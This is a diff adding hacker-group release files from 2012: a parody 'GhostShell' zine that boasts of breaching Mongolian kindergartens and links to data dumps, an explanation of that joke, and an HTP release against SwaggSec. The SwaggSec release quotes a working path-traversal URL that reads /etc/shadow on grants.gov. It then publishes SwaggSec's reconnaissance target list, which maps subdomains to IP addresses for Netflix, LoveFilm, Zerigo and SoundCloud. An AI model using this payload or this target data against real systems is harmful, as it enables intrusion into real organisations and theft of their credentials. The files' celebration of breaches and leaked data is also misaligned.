@@ -0,0 +1,95 @@
+TEAM GHOST SHELL PRESENTS...
+___  ___                        _ _             
+|  \/  |                       | (_)            
+| .  . | ___  _ __   __ _  ___ | |_  __ _ _ __  
+| |\/| |/ _ \| '_ \ / _` |/ _ \| | |/ _` | '_ \ 
+| |  | | (_) | | | | (_| | (_) | | | (_| | | | |
+\_|  |_/\___/|_| |_|\__, |\___/|_|_|\__,_|_| |_|
+                     __/ |                      
+                    |___/                       
+ _   ___           _                              _                
+| | / (_)         | |                            | |               
+| |/ / _ _ __   __| | ___ _ __ __ _  __ _ _ __ __| | ___ _ __  ___ 
+|    \| | '_ \ / _` |/ _ \ '__/ _` |/ _` | '__/ _` |/ _ \ '_ \/ __|
+| |\  \ | | | | (_| |  __/ | | (_| | (_| | | | (_| |  __/ | | \__ \
+\_| \_/_|_| |_|\__,_|\___|_|  \__, |\__,_|_|  \__,_|\___|_| |_|___/
+                               __/ |                               
+                              |___/                                
+ 
+Far too long Mongolian kindergardeners have been oppressed. The average
+kindergardener only gets 45 minutes of playtime, imposed on them by
+politicians and leaders. A way of thinking outdated for well over 100
+years now. The still present communism feeling has fused with todays
+capitalism and bred together a level of corruption and lack of
+decency of which Elementary Schools have never seen before.
+ 
+Young children are being silenced for creating shit writeups, and
+journalists/reporters conveniently flock toward them, unaware of what
+a zine really is (or traversal, as the aforementioned children choose
+low hanging fruit such as UNION-based SQLis and JSP services plainly LFI
+injectable running as root). They launch what are referred to as
+'spontaneous protests', which refers to their ability to take a very clearly
+un-corrupt target and write some bullshit about it that sounds like they
+are s4v1ng th3 plan3t. Truely, though, their works of childish art
+are full of empty promises. They deserve to be put to a well-deserved
+rest.
+ 
+And yet, actual injustice is all over the world, but teen angst drives
+DeadMellox (12) to find it in the most obscure of places.
+ 
+GhostShell is declaring WAR on Mongolian Kindergardens. We'll start with
+a nice greeting of what we found to be the MOST oppressive one (we found
+it using our 1337 scann1ng t00lz, sorry we never release anythin beyond
+what our tools give). Our breach consists over OVER SEVENTY THOUSAND
+CHILDREN.
+ 
+GhostShell currently has access to more Mongolian Kindergardens than HTP
+would ever care to get, and we are very much  eager to prove it.
+- [HAVIJ_KING][SABU_WOULD_BE_PROUD]DeadMellox, leader of the Free World,
+sympathizer of crying eagles, PATRIOT AS FUCK
+ 
+ |* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO|      ///          ///
+ | * * * * * * * * *  :::::::::::::::::::::::::|      \ //        /  /    
+ |* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO|       \ ////   _/  /   
+ | * * * * * * * * *  :::::::::::::::::::::::::|        \_  ////    /   
+ |* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO|          \___/    /    
+ | * * * * * * * * *  ::::::::::::::::::::;::::|          /         \_
+ |* * * * * * * * * * OOOOOOOOOOOOOOOOOOOOOOOOO|         /,)-_(  \_   \
+ |:::::::::::::::::::::::::::::::::::::::::::::|         (/?  \\ / \\\\
+ |OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO|               //
+ |:::::::::::::::::::::::::::::::::::::::::::::|              ((`
+ |OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO|           JUSTICE,
+ |:::::::::::::::::::::::::::::::::::::::::::::|               `TEAMGHOSTSHELL
+ |OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO|
+
+Enjoy our release, in the most inconvienent way possible
+ 
+KINDERGARDEN 1 Mirror1: http://slexy.org/view/s22v6X5rZ6 Mirror2: http://pastesite.com/83441
+ 
+KINDERGARDEN 2 Mirror1: http://slexy.org/view/s26QJkW3Ix Mirror2: http://pastesite.com/83442
+ 
+KINDERGARDEN 3 Mirror1: http://slexy.org/view/s25Yn35fOk Mirror2: http://pastesite.com/83443
+ 
+KINDERGARDEN 4 Mirror1: http://slexy.org/view/s2NqQ5HQyj Mirror2: http://pastesite.com/83444
+ 
+KINDERGARDEN 5 Mirror1: http://slexy.org/view/s2ikXFm8bG Mirror2: http://pastesite.com/83445
+ 
+KINGERGARDEN 6 Mirror1: http://slexy.org/view/s2ARvbRQJs Mirror2: http://pastesite.com/83446
+ 
+KINDERGARDEN 7 Mirror1: http://slexy.org/view/s21ZpvXoz6 Mirror2: http://pastesite.com/83447
+ 
+KINDERGARDEN 8 Mirror1: http://slexy.org/view/s2gREph8KO Mirror2: http://pastesite.com/83448
+ 
+KINDERGARDEN 9 Mirror1: http://slexy.org/view/s2085ZKV5C Mirror2: http://pastesite.com/83449
+ 
+KINDERGARDEN 10 Mirror1: http://slexy.org/view/s2qyopNlkn Mirror2: http://pastesite.com/83450
+ 
+KINDERGARDEN 11 Mirror1: http://slexy.org/view/s2mpxeQMwT Mirror2: http://pastesite.com/83451
+ 
+KINDERGARDEN 12 Mirror1: http://slexy.org/view/s2oga6kGOc Mirror2: http://pastesite.com/83452
+ 
+KINDERGARDEN 13 Mirror1: http://slexy.org/view/s21dKJAwJj Mirror2: http://pastesite.com/83453
+ 
+KINDERGARDEN 14 Mirror1: http://slexy.org/view/s21HsLSgwe Mirror2: http://pastesite.com/83454
+ 
+KINDERGARDEN 15 Mirror1: http://slexy.org/view/s21rXqRQss Mirror2: http://pastesite.com/83455

htp/ghostshell_explanation.txt

@@ -0,0 +1,17 @@
+This was a joke zine we did, after argung with DeadMellox on Twitter. He seemed 
+to think that 'TeamGhostShell' was superior, with its overuse of skid tools and 
+long-winded chest-beating at the beginning of all their zines. He told us to go 
+hack Mongolian kindergartens, so we did just that. Since a lot of his objection 
+to us seemed to be based on style, we decided to parody his utterly godawful 
+zine style for the sole purpose of making him cry like a little bitch.                        
+ 
+As far as any of us can tell, it worked. Less than an hour after the fake zine 
+originally went up, he deleted all tweets mentioning us and refused to engage 
+further. Many eagles cried that night, and for that, we are proud.             
+ 
+Unfortunately, after seeing our parody zine, DeadMellox saw fit to change his 
+style. He went from writing 15-20 paragraphs of shit nobody is ever going to 
+read about his e-peen, followed by paste links to the data people care about in 
+the most inconvenient way imaginable, to 30-40 paragraphs of shit nobody is ever 
+going to read about his e-peen, followed by paste links to the data people care 
+about in the most inconvenient way imaginable.                             

htp/htpmini2.txt

@@ -0,0 +1,718 @@
+     ▒▒░░░░░░▒▒▓▓▓▓▓▓▓▓▓▓███▓▓▒▓▓▒▒▓▓▓██▓▓▓██▓▒▒▓███████████████████████████████
+     ░░░░░░ ░░▒▓▓▒▒▒▒▓▓▓▓▓▓▓▓▓█▓▓▒▒▒▓▓▓▓███▒███▓▓██████▓████████████████████████
+     ░    ░ ░ ▒▒▒▒▒▒▓▓▓▓▓▓▓▒▓█▓▒▓▓▒▓▓▒▒▒▓█▓▓▓█▓▒▓██████▓████████████████████████
+     ░   ░░ ░ ▒▒▒▓▓▓▓▓▓█▓▓▓▓██▓█▓▓▓▒▓▓▓▓▓▓▒▓▓▒▒▒▒███████████████████████████████
+     ░   ░  ░ ▒▓▓▓▓▓▓▓▓██▓▓▓█████▒▓▓▓▓▒▒▓ ░ ░▒▒▓▒███████████████████████████████
+     ░   ░  ░ ▒▓▓▓▓▓▓▓▓▓▓▒▒▓▓▓██▓▒▒▒▓▒       ░ ░▓█████████████████████████████▓█
+     ░   ░  ░ ▒▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▒░░░            ░▒█████████████████████████████▓
+     ░░░░   ░ ░▒▒▒▓▓▓▓█▓▓▓▓▓▓▓▒░                ░░▓█████▓███████████████████████
+     ░      ░░░░░▒▒▒▓▓▓▓█▓▓▓▓▒▓░               ░░░▒█████▓███▓██████████████████▓
+     ░░     ░ ░░░░▀▒▓▓▓▓▓█▓▒▒▓▓░              ░░░░▒▓█████████████████████▓▓▓▓▓▓▓
+     ░░     ░  ░ ░░▄▓▓▓▓▓▓▓▒▓▓▓▓▓░░░ ░  ░░ ▄▄▓▓▓▓▓▒▒█████████████████████▒▒▓▓▓▓▓
+     ░      ░    ░░▒▓▓▓▓▓█▒▓▒▒▒▒▒▓▒▓▒▒░  ▄▒▓▓█▓▓▒▒▓▒█████████████████████░▒▒▒▒▒▒
+     ░      ░    ░ ░█▓▓▓▓▓  ▒▓▒▒░  ░░ ░  ░░░ ░░░  ▓▓████▓████████████████ ░░░░░▒
+     ░      ░      ░█▓▓▒▒▒ ░  ▒▓▓     ░   ░ ░░    ▒▓█████▓███████████████ ░░   ▒
+     ░      ░      ░█▓▓▒▓▓█▓▓░ ▒▒    ░░   ░░    ░░▒▓██████▒▒▒▒▒▒▒▒▒▒▓████░░░░ ░▓
+     ░      ░       █ ▓▓▓▓█▓▓░░░     ░░   ░░     ░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓      ▒
+     ░      ░░   ░  █░ ▓▓▓▓▓▓▓░░     ░▒░░▓▒▒░   ░░▓████▓██▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒      ░
+     ░      ░       █░░░▓▒▓▓▓▓░░░      ░░░  ░  ░░░▒███████▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒       
+     ░      ░░     ░█   ▒▓▓▓▓▓░░░    ░▄▄▄  ▄░░░░▓▓████████▒▒▒▒▒▒▒▒▒▒▒░▒▒▒░░   ░▒
+     ░ ░    ░░     ░▓   ▒▒█▓▓█▒▀░░  ▀░░░░░▄▒░░░▒▒▓██▓████▓▒▒▒▒▒▒▒▒▒▒▒ ░░░▒▒▒░  ▓
+    ░░░░    ▒    ░  ▓   ▒▓██▓▓▓ ▀░░░  ░▒▀▀▄▓▄░▓▒▒██████▓█▓▒▒▒▒▒▒▓▓▓▒▒   ░███▓▓▓█
+    ░▒ ░    ▒ ░     ▓   ▒▒▓███▓  ▀░░ ░░░ ░░▀▄▀▄▒▒█████▓▒▓▓▓▓▓▓▓▓▓▓▓▓████████████
+    ░▒ ░    ▒       ▒  ░▒▒██▓▓░░ ░▀▄ ░░░░░▒▓▒▀▄▀▄▓███▓▓▓▓███▓█▓▓▓▓▓█████████▓███
+    ░▒░░    ▒░   ░░ ▒   ▓▒▓▒░ ░ ░░  ▀▀▒▒▒▓▓▓▓▓▒▀▄░▓██▓▓▓████████▓▒▒▒████████████
+   ░▒░░░   ░▒ ░  ░░ ▓  ▓█▓▓▓░░  ░      ▀▓▓▓▓▓▓▒▒▒▓▄████████████▓▒▒▒▒████████████
+░ ░░▒░░░  ░░▓   ░░░▒███████▓░░ ░░░     ░ ░░ ░░░░ ▓▓█████████████████████████████
+░░░░▒░░░ ░ ░▓ ▄▄████████████▓░░░            ░░ ▄████████████████████████████████
+░░░ ▒░░░░░░ ▓███████████████▓███▄ ░          ▓██████████████████████████████████
+░░░ ▒░░░░░▓█████████████████████████████████████████████████████████████████████
+░░░░▓░░░▓███████████████████████████████████████████████████████████████████████
+░░░ ▓░░▒████████████████████████████████████████████████████████████████████████
+░░░░▓░▒█████████████████████████████████████████████████████████████████████████
+░░░░▓▒██████████████████████████████████████████████████████████████████████████
+░░░▒▓███████████████████████▓█████▓▀ ▀▀░░▀██████░███████████████████████████████
+░░░▓███████████████████████░████████▒░░░████████░███████████████████████████████
+░░░████████████████████████ ████████▓░ ░████████░░██████████████████████████████
+░░▓███████████████████████ ░▓███████▒░░░████████▒ ██████████████████████████████
+░▒████████████████████████ ░▒██▀▀  ░░░ ░   ░░▓█▓▒ ▓█████████████████████████████
+░▓████████████████████████░ ▒▒ ░░░░░ ░░░ ░░░░  ░▒░▓█████████████████████████████
+▒█████████████████████████░ ▒▒░░     ░ ░ ░░░░░░░▒ ░▓████████████████████████████
+▒████████████████████████▀░ ▒▒░ ░░░░░▒▒▒      ░▒▒ ░ ▀███████████████████████████
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
+              █████    ▀ ▀██▄▄     ▄▄▄▄▄▄▄▄▄▄ ▄  █▄▄                           █
+              █████        ████        ███       ████▀▀▀▀▀▀▀▀█                 █
+              █████         ████       ████      ████        █   VS SwaggSec   ▓
+              █████ ████████ ████      ████      ████ ▀ ▀▀ ▀▀▀                 ▒
+              █████          █████     ████      ████           Mini Release 2 ░
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄  
+                                                                               ░
+                     IN COMMONLY USED PASSWORDS WE TRUST                        
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ 
+                                                                                
+                                                                                
+                                GATSBY                                          
+                    Anyway, anyway, guys guys guys, come on. I'm                
+                    in this computer, right. So I'm looking                     
+                    around, looking around, you know, throwing                  
+                    commands at it, I don't know where it is or                 
+                    what it does or anything. It's like, it's                   
+                    like choice, it's just beautiful, okay. Like                
+                    four hours I'm just messing around in there.                
+                    Finally I figure out, that it's an IRCD.                    
+                    Right, okay wait, okay, so it's an IRCD.                    
+                    So, this morning, I released it on Pastebin..               
+                                                                                
+                                HTP                                             
+                    You released it?                                            
+                                                                                
+        Gatsby takes a drag from his cigarette and just nods, with a            
+        big grin on his face.                                                   
+                                                                                
+                                CHIPPY                                          
+                    What are you, stoned or stupid?                             
+                                                                                
+                                                                                
+                      ▀ ▄                                                       
+                         █▄▄                                                    
+                    ▄____ ░ █▄                                                  
+          ▄   ▄███▀▀ \;',`'-,▓█░                                                
+            ▓██▀-;_,;  ':-;_,'.█▓░                                              
+          ▓▓██;   '/    ,  _`.-\█▓                                              
+        ░▓███▄'`. (`     /` ` \`|█                                              
+     ░ ▓▓▓ █|██  `\`-.   \_   / |▓                                              
+   ░█▓▓█▓░░ |  █▓ (   `,  .`\ ;'|░                                              
+  ░▓▓█░ ░░   \ ░ ▓░░ .'     `-'/▀                                               
+▄▄▓▓▄▄▄▄▄▄▄▄▄▄▄▄▓▄▄▓▓▓░      .'▀                                                
+░██▓▀ ▀█████████████████▄.-'`                                                   
+ ███░  ███▀▀███▀▀███  ███                                                       
+ █████████  ███  ███▄▄███  2012  ▒ ░                                            
+ █████████  ███  ██████▀                                                        
+ ███   ███  ███  ███                                                            
+▄███▄ ▄███▄ ███ ▄███▄                                                           
+▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀                                                          
+                                                                                
+▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
+                                                                                
+ > Swagg Security, who you may know as yet another 'Lulzsec' wanna-be, is the   
+   latest group that has been petitioning to be owned by us. Their releases have
+   made several headlines over the past twelve months, included are: China      
+   Telecom, Warner Bros, Farmers Insurance, Library of Congress, grants.gov,    
+   arts.gov, uscis.gov, and Foxconn. We watched them and observed (through our  
+   own research) what vectors they used, which were primarily scripts that used 
+   JSP engines. For example, their grants.gov injection:                        
+                                                                                
+http://www.grants.gov/search/downloadAttachment.do?afn=../../../../../etc/shadow
+                                                                                
+   And after some social engineering, we found they had in fact read one of our 
+   guides on JSP engines.                                                       
+                                                                                
+   So we decided to locate and hook the network they were using, which turned   
+   out to be 'CrimeIRCd' (irc.crimeircd.net). Their channel at the time,        
+   #security, was also hooked. Their unabridged target list (as of today, Dec 2)
+   is as follows:                                                               
+                                                                                
+--------------------------------------------------------------------------------
+
+craigslist.org
+
+netflix.com
+https://signup.netflix.com/Login
+https://contactus.netflix.com/contactus?locale=en-SE
+https://pcr.netflix.com/offer/index.jsp?src=nflxihgPCR0410&cm_sp=IMMerch-_-PC2_GL_en-_-MM3_AL_QuickLinks_Anon_Netflix
+https://delta.netflix.com/popup/popup.jsp?p=privacy.htm&t=Privacy%20Policy
+ca.netflix.com/entryTrap.jsp?why=hyperactive
+ir.netflix.com/financials.cfm?CategoryID=282
+http://ir.netflix.com/secfiling.cfm?filingID=1193125-11-350305&CIK=1065280
+http://www.shareholder.com/visitors/activeedgardoc.cfm?f=xls&companyid=NFLX&id=8303283
+http://ir.netflix.com/common/download/sec.cfm?companyid=NFLX&fid=1193125-11-350305&cik=1065280
+http://ir.netflix.com/secfiling.cfm?sh_email=yes&filingid=1193125-11-350305&CIK=1065280
+http://apps.shareholder.com/sec/viewerContent.aspx?companyid=NFLX&docid=8303283&print=yes
+ir.netflix.com/releases.cfm?Year=2002
+www.netflix.com/Search?v1=cfm+international
+http://ir.netflix.com/common/mobile/iphone/index.cfm?CompanyID=NFLX&mobileid=
+http://ir.netflix.com/common/mobile/iphone/releasedetail.cfm?ReleaseID=669408&CompanyID=NFLX&MobileID=
+http://ir.netflix.com/documentdisplay.cfm?DocumentID=139&CommitteeID=34
+ir.netflix.com/sec.cfm?DocType=Other&Year=&FormatFilter=
+http://ir.netflix.com/sec.cfm?SortOrder=Type%20Ascending&DocType=Annual&DocTypeExclude=&Year=&FormatFilter=&CIK=
+ir.netflix.com/eventdetail.cfm?EventID=113319
+http://ir.netflix.com/stocklookup.cfm?historic_Month=1&historic_Day=3&historic_Year=2004
+http://ir.netflix.com/common/mobile/iphone/releasetable.cfm?releaseid=86119&tablenumber=1&CompanyID=NFLX
+https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FDVDDetail.aspx%3Flocale%3Den-IE%26Title%3DMayhem
+developer.netflix.com/search?q=xml&page=3
+https://signup.netflix.com/login?nextpage=http%3A%2F%2Fwww.netflix.com%2FXML%2FU%2FMovieData%3Fpos%3D8%26ds%3D0%26linkCtr%3DTXT%26movieid%3D443317%26bobenhanced%3Dyes
+
+216.205.72.158    atlanta.netflix.com
+69.53.236.144    b2b.netflix.com
+69.53.236.18    beta.netflix.com
+69.53.236.15    ca.netflix.com
+207.210.238.73    delta.netflix.com
+69.53.236.147    ftp.netflix.com
+69.53.236.24    images.netflix.com
+69.53.237.38    jobs.netflix.com
+69.53.237.168    kb.netflix.com
+69.53.237.40    listserv.netflix.com
+127.0.0.1    localhost.netflix.com
+10.192.52.70    mm.netflix.com
+10.192.52.69    mm.netflix.com
+216.35.131.141    mx.netflix.com
+69.53.255.10    ns1.netflix.com
+69.53.254.10    ns2.netflix.com
+69.53.236.16    partners.netflix.com
+216.35.131.252    qa.netflix.com
+69.53.236.21    rd.netflix.com
+69.53.236.148    research.netflix.com
+69.53.237.157    smtp.netflix.com
+69.53.237.156    smtp.netflix.com
+69.53.236.23    stage.netflix.com
+69.53.236.45    support.netflix.com
+216.35.131.199    uk.netflix.com
+216.35.131.141    vpn.netflix.com
+69.53.236.23    web.netflix.com
+69.53.237.151    webmail.netflix.com
+69.53.236.48    www1.netflix.com
+69.53.236.19    www2.netflix.com
+
+    aa.netflix.com
+
+    agmoviecontrol.netflix.com
+
+    aladdin.netflix.com
+
+    api.netflix.com
+
+    beta.netflix.com
+
+    blog.netflix.com
+
+    cdn.netflix.com
+
+    chi1.netflix.com
+
+    corp.netflix.com
+
+    dc-nat.netflix.com
+
+    dc1.netflix.com
+
+    dc2.netflix.com
+
+    dns.netflix.com
+
+    dns2.netflix.com
+
+    dns3.netflix.com
+
+    dns5.netflix.com
+
+    dns6.netflix.com
+
+    dtemkin.netflix.com
+
+    edi01-vip1.netflix.com
+
+    edi01-vip2.netflix.com
+
+    ehub.netflix.com
+
+    equinix-sjc.netflix.com
+
+    ftp.netflix.com
+
+    grparker.netflix.com
+
+    gslbdns.netflix.com
+
+    gslbdns2.netflix.com
+
+    hb-nat.netflix.com
+
+    host49.netflix.com
+
+    host50.netflix.com
+
+    host51.netflix.com
+
+    host52.netflix.com
+
+    host53.netflix.com
+
+    host54.netflix.com
+
+    host55.netflix.com
+
+    host56.netflix.com
+
+    host57.netflix.com
+
+    host58.netflix.com
+
+    host59.netflix.com
+
+    host60.netflix.com
+
+    host61.netflix.com
+
+    host62.netflix.com
+
+    hostmaster.netflix.com
+
+    image.netflix.com
+
+    ipv6.netflix.com
+
+    ir.netflix.com
+
+    jobs.netflix.com
+
+    lg-nat.netflix.com
+
+    moviecontrol.netflix.com
+
+    movielicense.netflix.com
+
+    movies.netflix.com
+
+    mta00-ecom.netflix.com
+
+    mta00-mktg.netflix.com
+
+    mta01-ecom.netflix.com
+
+    mta01-mktg.netflix.com
+
+    mta02-ecom.netflix.com
+
+    mta02-mktg.netflix.com
+
+    mta03-ecom.netflix.com
+
+    mta03-mktg.netflix.com
+
+    mta04-ecom.netflix.com
+
+    mta04-mktg.netflix.com
+
+    mta05-ecom.netflix.com
+
+    mta05-mktg.netflix.com
+
+    mta06-ecom.netflix.com
+
+    mta06-mktg.netflix.com
+
+    mta07-ecom.netflix.com
+
+    mta07-mktg.netflix.com
+
+    mta08-ecom.netflix.com
+
+    mta08-mktg.netflix.com
+
+    mta09-ecom.netflix.com
+
+    mta09-mktg.netflix.com
+
+    mta10-ecom.netflix.com
+
+    mta10-mktg.netflix.com
+
+    mta11-ecom.netflix.com
+
+    mta11-mktg.netflix.com
+
+    mta12-mktg.netflix.com
+
+    mta13-ecom.netflix.com
+
+    mta13-mktg.netflix.com
+
+    mta14-ecom.netflix.com
+
+    mta14-mktg.netflix.com
+
+    mta15-ecom.netflix.com
+
+    mta15-mktg.netflix.com
+
+    mta16-ecom.netflix.com
+
+    mta16-mktg.netflix.com
+
+    mta17-ecom.netflix.com
+
+    mta17-mktg.netflix.com
+
+    mta18-ecom.netflix.com
+
+    mta18-mktg.netflix.com
+
+    mta19-ecom.netflix.com
+
+    mta19-mktg.netflix.com
+
+    mx-ecom.netflix.com
+
+    mx-mktg.netflix.com
+
+    mx-mktgco.netflix.com
+
+    mx-mktgnonmem.netflix.com
+
+    mx-setl.netflix.com
+
+    mx1.netflix.com
+
+    mx2.netflix.com
+
+    nat.netflix.com
+
+    nicadmin.netflix.com
+
+    ns1.netflix.com
+
+    ns2.netflix.com
+
+    oscarquotes.netflix.com
+
+    paix1.netflix.com
+
+    partners.netflix.com
+
+    prod.netflix.com
+
+    prod1.netflix.com
+
+    rd.netflix.com
+
+    research.netflix.com
+
+    rss.netflix.com
+
+    screening.netflix.com
+
+    splatter.netflix.com
+
+    stage.netflix.com
+
+    unk.netflix.com
+
+    web.netflix.com
+
+    +http://ultradns.org 
+---
+ticketmaster.com 
+
+tickets.com
+
+glennbeck.com
+
+---
+lovefilm.com
+
+212.140.241.196    access.lovefilm.com
+82.109.92.116    ad.lovefilm.com
+79.125.13.66    blog.lovefilm.com
+194.117.248.107    csdev.lovefilm.com
+194.117.248.104    cs.lovefilm.com
+194.117.248.99    images4.lovefilm.com
+194.117.248.94    staging.lovefilm.com
+194.117.248.93    apistage.lovefilm.com
+194.117.248.96    images1.lovefilm.com
+194.117.248.97    images2.lovefilm.com
+194.117.248.98    images3.lovefilm.com
+194.117.248.100    digital.lovefilm.com
+194.117.248.100    lovefilm.com
+194.117.248.100    www.lovefilm.com
+194.117.248.100    aol.lovefilm.com
+194.117.248.100    virginnet.lovefilm.com
+194.117.248.100    help.shop.lovefilm.com
+194.117.248.100    shop.lovefilm.com
+194.117.248.111    cert.lovefilm.com
+194.117.248.116    testcard.lovefilm.com
+194.117.248.117    watchnow-dev.lovefilm.com
+194.117.248.119    openapi.lovefilm.com
+194.117.248.123    static.digital-preview.lovefilm.com
+194.117.248.126    watchnow.lovefilm.com
+194.117.248.127    openapi.mashery.lovefilm.com
+194.117.248.130    dailymail.lovefilm.com
+194.117.248.131    digital-test.lovefilm.com
+194.117.248.127    api.mashery.lovefilm.com
+194.117.248.123    digital-preview.lovefilm.dev3.lovefilm.com
+194.117.248.123    digital-preview.static.lovefilm.dev3.lovefilm.com
+194.117.248.123    digital-qa.lovefilm.com
+194.117.248.119    api.lovefilm.com
+194.117.248.117    api.digital-tv.lovefilm.com
+194.117.248.117    digital-preview.lovefilm.dev4.lovefilm.com
+194.117.248.117    digital-preview.lovefilm.com
+194.117.248.117    digital-tv.lovefilm.com
+194.117.248.150    chat.lovefilm.com
+194.117.248.152    apiext1.lovefilm.com
+212.140.241.202    ftp.lovefilm.com
+212.60.14.114    germany.lovefilm.com
+83.100.128.50    info.lovefilm.com
+194.117.248.130    london.lovefilm.com
+82.151.231.188    mailhost.lovefilm.com
+82.151.234.76    office.lovefilm.com
+212.140.241.201    partners.lovefilm.com
+212.140.241.207    remote.lovefilm.com
+194.117.248.100    static.lovefilm.com
+217.72.240.200    streaming.lovefilm.com
+213.115.60.196    sweden.lovefilm.com
+194.117.248.176    star.lovefilm.com
+194.117.248.176    test.lovefilm.com
+194.117.248.176    bounce.lovefilm.com
+194.117.248.176    gbc1-be-12.lovefilm.com
+212.140.241.194    vpn.lovefilm.com
+85.133.5.116    vpn2.lovefilm.com
+212.140.241.218    webmail.lovefilm.com
+
+
+http://www.lovefilm.com/browse/film/watch-online/subscription/?facet-3=collection_id%7C8562
+www.lovefilm.com/browse/film.html?facet-1=catalog%7Cvideo&facet-2=media%7Cdigital&facet-3=collection_id%7C9404&order=collection
+http://www.lovefilm.com/signup/1?intcid=lfctasuwohppp1
+http://www.lovefilm.com/browse/film/watch-online/p3/?facet-3=collection_id|9404&sort_by=collection
+http://www.lovefilm.com/browse/film/watch-online/?facet-3=collection_id|9389&sort_by=collection&intcid=masthead_digital_lost
+https://www.lovefilm.com/visitor/sign_up_1.html?product_id=42414
+https://www.lovefilm.com/visitor/login.html?overlay=sign_in
+
+
+9gag.com
+
+http://9gag.com/pref/safe-browse?enable=0&url=%2F&nsfw=1
+https://9gag.com/login/?ref=%2Fpref%2Fsafe-browse%3Fenable%3D0%26url%3D%252F%26nsfw%3D1&nsfw=1
+https://9gag.com/login
+http://9gag.com/gag/4385167?ref=featured
+https://9gag.com/login/?ref=/submit/photo
+https://9gag.com/search?query=swaggsec&page=3
+
+All Domains piratepad.net/9gagswagger
+
+
+airtime.com
+
+
+    +http://www.zerigo.com/
+    64.27.57.0    network.ptr.zerigo.net
+    64.27.57.1    gw.ptr.zerigo.net
+    64.27.57.2    gw-r1.ptr.zerigo.net
+    64.27.57.3    gw-r2.ptr.zerigo.net
+    64.27.57.4    gw1.zerigo.net
+    64.27.57.5    gw2.zerigo.net
+    64.27.57.10    ns1.zerigo.net
+    64.27.57.11    a.ns.zerigo.net
+    64.27.57.12    a.watcher.zerigo.net
+    64.27.57.15    bk1.zerigo.net
+    64.27.57.16    bk2.zerigo.net
+    64.27.57.17    p.ns.zerigo.net
+    64.27.57.19    tick.zerigo.net
+    64.27.57.20    ns2.zerigo.net
+    64.27.57.21    21.ptr.zerigo.net
+    64.27.57.22    d.ns.zerigo.net
+    64.27.57.23    ipr1.ns.zerigo.net
+    64.27.57.24    url1.zerigo.net
+    64.27.57.26    mail1.zerigo.net
+    64.27.57.29    url2.zerigo.net
+    64.27.57.38    logomatic.zerigo.net
+    64.27.57.255    broadcast.ptr.zerigo.net
+    68.71.141.21    21.ptr.zerigo.net
+    68.71.141.16    16.ptr.zerigo.net
+    68.71.141.11    11.ptr.zerigo.net
+    68.71.141.10    10.ptr.zerigo.net
+    68.71.141.5    gw2b.zerigo.net
+    68.71.141.0    network.ptr.zerigo.net
+    68.71.141.1    gw.ptr.zerigo.net
+    68.71.141.2    gw-r1.ptr.zerigo.net
+    68.71.141.3    gw-r2.ptr.zerigo.net
+    68.71.141.4    gw1b.zerigo.net
+    68.71.141.12    a.smtpweb.zerigo.net
+    68.71.141.13    13.ptr.zerigo.net
+    68.71.141.15    logomatic.zerigo.net
+    68.71.141.17    p2.ns.zerigo.net
+    68.71.141.18    18.ptr.zerigo.net
+    68.71.141.19    tock.zerigo.net
+    68.71.141.20    20.ptr.zerigo.net
+    68.71.141.22    s1.ns.zerigo.net
+    68.71.141.23    ipr2.ns.zerigo.net
+    68.71.141.24    24.ptr.zerigo.net
+    68.71.141.26    mail2.zerigo.net
+    68.71.141.30    30.ptr.zerigo.net
+    68.71.141.31    31.ptr.zerigo.net
+    64.27.57.21    vpn.zerigo.net
+    64.27.57.6    www.zerigo.net
+
+    68.71.141.14    vconsole.zerigo.com
+    68.71.141.9    servers.zerigo.com
+    68.71.141.6    www.zerigo.com
+    68.71.141.7    watchdog.zerigo.com
+    68.71.141.8    dns.zerigo.com
+    68.71.141.16    backend.zerigo.com
+    64.27.57.8    dns.zerigo.com
+    4.27.57.6    www.zerigo.com
+    64.27.57.7    watchdog.zerigo.com
+    64.27.57.9    servers.zerigo.com
+    64.27.57.13    console.zerigo.com
+    64.27.57.14    www01.zerigo.com
+    64.27.57.18    debian.zerigo.com
+    68.71.141.11    ec.zerigo.com
+    64.27.57.25    manage.zerigo.com
+    64.27.57.27    ws.zerigo.com
+    64.27.57.28    update.zerigo.com
+    64.27.57.31    snapshots.zerigo.com
+    64.27.57.8    ns.zerigo.com
+
+
+soundcloud.com
+https://soundcloud.com/login
+http://soundcloud.com/tracks/search?page=50&q[fulltext]=lol&q[genre]=%22Pop%22
+
+178.249.136.150    admin.soundcloud.com
+178.249.136.150    beta.soundcloud.com
+96.126.126.252    blog.soundcloud.com
+178.249.136.153    connect.soundcloud.com
+174.129.212.2    dev.soundcloud.com
+75.101.145.87    dev.soundcloud.com
